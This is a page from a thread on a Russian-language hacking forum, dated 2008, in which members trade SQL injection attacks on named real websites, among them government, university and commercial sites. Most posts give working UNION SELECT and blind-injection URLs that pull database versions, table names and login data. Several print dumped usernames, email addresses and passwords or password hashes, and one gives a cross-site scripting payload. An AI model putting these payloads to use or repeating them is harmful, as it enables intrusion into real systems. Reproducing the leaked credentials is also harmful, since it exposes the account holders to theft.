HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 611 из 1602 « Первая < 111511561601 607 608 609 610 611 612 613 614 615 6216617111111 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.08.2008, 22:45
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами: 9387494

Репутация: 36
По умолчанию
Доктор слух у меня вопрос по поводу @@ - зач енто?Если влом обьяснять то скажи ссылку где проэто написано!?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 07.08.2008, 22:48
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
С нами: 9591697

Репутация: 96
По умолчанию
www.sport-moda.ru

Уязвимость в скрипте показа новостей:

http://www.sport-moda.ru/news/view_new.php?id=1'

Колонки:

http://www.sport-moda.ru/news/view_new.php?id=-286+union+select+1,2,3/*

Информация о базе:

u15055
5.0.45-log
u15055@10.10.10.131
 
Ответить с цитированием

  #3  
Старый 07.08.2008, 22:48
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию
BanQui
таким способом узнается версия в mssql

@@version тоже самое что и version() просто для каждой системы свои запросы )

$p01nt
жаль нельзя аватарки заливать (
Последний раз редактировалось sabe; 07.08.2008 в 23:51..
 
Ответить с цитированием

  #4  
Старый 07.08.2008, 22:52
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами: 10263663

Репутация: 1559


По умолчанию
Цитата:
Сообщение от BanQui  
Доктор слух у меня вопрос по поводу @@ - зач енто?Если влом обьяснять то скажи ссылку где проэто написано!?
потому что это MSSQL в MSSQL так и узнаётся версия )
 
Ответить с цитированием

  #5  
Старый 08.08.2008, 00:15
MirA
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами: 9367310

Репутация: 52
По умолчанию
http://www.sephiroth.it PR 4
4 ветка слепая скуль)
Цитата:
http://www.sephiroth.it/file_detail.php?id=-139+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11
http://www.infn.it если верить гуглу,то PR 8
и опять blind...
version=5
Цитата:
http://www.infn.it/news/newsen.php?id=-390+union+select+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35
http://www.hvar.is PR 6
version = 5 blind sql
Цитата:
http://www.hvar.is/sida.php?id=5+and+5=substring(version(),1,1)
http://www.ethics.utoronto.ca PR 5
version = 3
Цитата:
http://www.ethics.utoronto.ca/index.php?nid=20+and+substring(version(),1,1)=3/*&id=20
всем удачного вечера =) HF & GL
 
Ответить с цитированием

  #6  
Старый 08.08.2008, 06:32
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию
Грузинские Сайты в тему:

http://www.tbilisi.gov.ge/index.php?Post=1%22%3E%20%3Cscript%3Ealert(/suki/)%3C/script%3E&sec_id=337&lang_id=DEU

Aversi.ge
Цитата:
http://www.aversi.ge/main.php?lang=geo&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,version(),17,18,19,20,21,22,23/*
Presa.ge
Цитата:
http://presa.ge/index.php?text=news&i=-1+union+select+1,2,concat_ws(0x3a,table_name),4,5, 6,7,8,9,10,11+from+information_schema.tables+limit +17,1--
5 ver. tables
Цитата:
http://presa.ge/index.php?text=news&i=-1+union+select+1,2,concat_ws(0x3a,user_username,us er_password),4,5,6,7,8,9,10,11+from+users--
Ssa.gov.ge
Цитата:
http://www.ssa.gov.ge/index.php?id=69&mid=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25
Flowers.ge
Цитата:
http://www.flowers.ge/fwpopup.php?fwid=-%2015+union+select+1,2,3,concat(char(60,115,116,97 ,114,116,62),table_name,char(58),column_name,char( 60,47,115,116,97,114,116,62)),5,6,7+from+INFORMATI ON_SCHEMA.COLUMNS+limit+0,1/*
Zona.ge
Цитата:
http://site.zona.ge/movies_form.php?name=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21+from+information_schem a.tables+limit+17,1--
5 ver tables...


DVV-international.ge
Цитата:
http://dvv-international.ge/dvv/index.php?sector=view_content&catid=-1+union+select+1,unhex(hex(table_name)),3,unhex(he x(table_schema))+from+information_schema.tables/*
Group.ge
Цитата:
http://group.ge/show.php?id_series=-1+union+select+1,concat(table_name,char(58),column _name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+ information_schema.columns--
5 ver. tables
Цитата:
http://group.ge/show.php?id_series=-1+union+select+1,concat(name,char(58),pass),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17+from+test.na_users--
admin;1234


Tvali.ge
Цитата:
http://www.tvali.ge/index.php?action=search&s=kenzo%20&limit=99999999+ union+select+1,2,table_name,4,5,6,7,8,9,10,11+from +information_schema.tables/*
5 ver. tables
Цитата:
http://www.tvali.ge/index.php?action=search&s=kenzo%20&limit=99999999+ union+select+1,2,concat_ws(0x3a,user_name,password ),4,5,6,7,8,9,10,11+from+tvali.co_user/*
Prschool.ge
Цитата:
http://www.prschool.ge/geo/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,tab le_name+from+information_schema.tables--
5 ver, tables..
Цитата:
http://www.prschool.ge/geo/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,con cat_ws(0x3a,username,user_password)+from+f_users--
юзеры..
Цитата:
http://www.prschool.ge/geo/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,con cat_ws(0x3a,name,passwd)+from+user--
admin.. но куда это все вводить я не искал..... язык не приемлев, а так кому интересно... смотрите.. если что в ПМ.

Superfootball.ge
Цитата:
http://superfootball.ge/pl/showpredictionsformatch.php?matchid=-1+union+select+1,2,3,table_name,5,6,7+from+informa tion_schema.tables+limit+17,1--
5 ver. tabels
Цитата:
http://superfootball.ge/pl/showpredictionsformatch.php?matchid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7+from+pluserdata--
Photo.ge
Цитата:
http://www.photo.ge/profile.php?pform=1'
все.. разкручивайте. ушел спать )
Последний раз редактировалось sabe; 08.08.2008 в 08:03..
 
Ответить с цитированием

  #7  
Старый 08.08.2008, 11:40
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию
завтрак:

Цитата:
http://www.arc.pdx.edu/dev/chemmap/content/mapsearch.php?getvariablename=7
Dbname:chemmap2
User:chemmap_l@bestla.oit.pdx.edu
Version:5.0.37

Цитата:
users
emailassword

sreed@pdx.edu:chemmap
class1:summer2007
class2:summer2007
nehal@pdx.edu:7623e2
amitk@pdx.edu:a9f2b8
savyak@pdx.edu:letmein
 
Ответить с цитированием

  #8  
Старый 08.08.2008, 12:17
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Код:
http://orlandokids.org/latest_infoDetails.php?id=-21+union+select+1,concat_ws(char(58),version(),user(),database()),3,4/*
Код:
http://www.somachlaw.com/attorneys_bio.php?id=-12+union+select+1,2,3,concat_ws(char(58),version(),user(),database()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
Код:
http://www.uplandsgallery.com/artists_details.php?id=-12+union+select+1,concat_ws(char(58),version(),user(),database()),3,4/*
Код:
http://www.screenroom.co.uk/php/id.asp?id=-1+union+select+1,2,user(),4,database(),version(),7,8,9,10,11,12,13--
Код:
http://www.alwg.cap.gov/index.php?menu=-90+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5/*
Код:
http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8+from+users--
Код:
http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(author,0x3a,password,0x3a,id),4,5,6,7,8+from+blog--
Код:
http://www.pogoda.ua/index.php?id=-1+union+select+1,concat_ws(0x3a,login,password,email),3,4,5+from+users/*
Код:
http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-1+union+select+convert(concat_ws(0x3a,user,password)+using+latin1),2,3,4+from+mysql.user/*
 
Ответить с цитированием

  #9  
Старый 08.08.2008, 12:29
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
С нами: 9937288

Репутация: 212
По умолчанию
http://www.aprinkis.lv/?id=400284&topic=1+union+select+1,2/*

VERSION: 4.0.22
USER: root@localhost
DATABASE: aprinkis

http://www.aprinkis.lv/?id=400284&topic=1+union+select+1,user/**/from/**/mysql.user/*
http://www.aprinkis.lv/?id=400284&topic=1+union+select+1,password/**/from/**/mysql.user/*

adserver:3befcaeb54184d83
birojutelpas:58ff6e1324b58e04
root:3f138964071fc658
andorraspeds:5ad72be31c9f299a
arktika:5c9caec300d17c0b
epicnic:62c1e60a26602275
indrikis:14a77f346c38c1da
irvarianti:676b813528fbb22e
kandava:1989d36d632e3f9b
leflatvia:5025123b461f063c
mailtender:01d600067d94830a
pirtslietas:79aa91e2338eebcf
progress_cms:753915067ffa83cc
progressolutions:54f03cad5ccd348b
remifa:6117f28d007f5cbd
riepuserviss:2fcf989a39cc6b42
termorelax:32ccd0865fab861c
tvaix:573cad0e0046f051
vidzemestirgus:47150cec595393d6

root: kandava
 
Ответить с цитированием

Суши тоже уязвимы
  #10  
Старый 08.08.2008, 13:50
DTW
Участник форума
Регистрация: 11.05.2008
Сообщений: 202
С нами: 9473484

Репутация: 104
По умолчанию Суши тоже уязвимы
Цитата:
http://www.sushipoint.lv/index.php?sel=-4+union+select+user()/*
http://www.sushipoint.lv/index.php?sel=-4+union+select+version()/*
Суши тоже уязвимы
 
Ответить с цитированием
Ответ
Страница 611 из 1602 « Первая < 111511561601 607 608 609 610 611 612 613 614 615 6216617111111 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.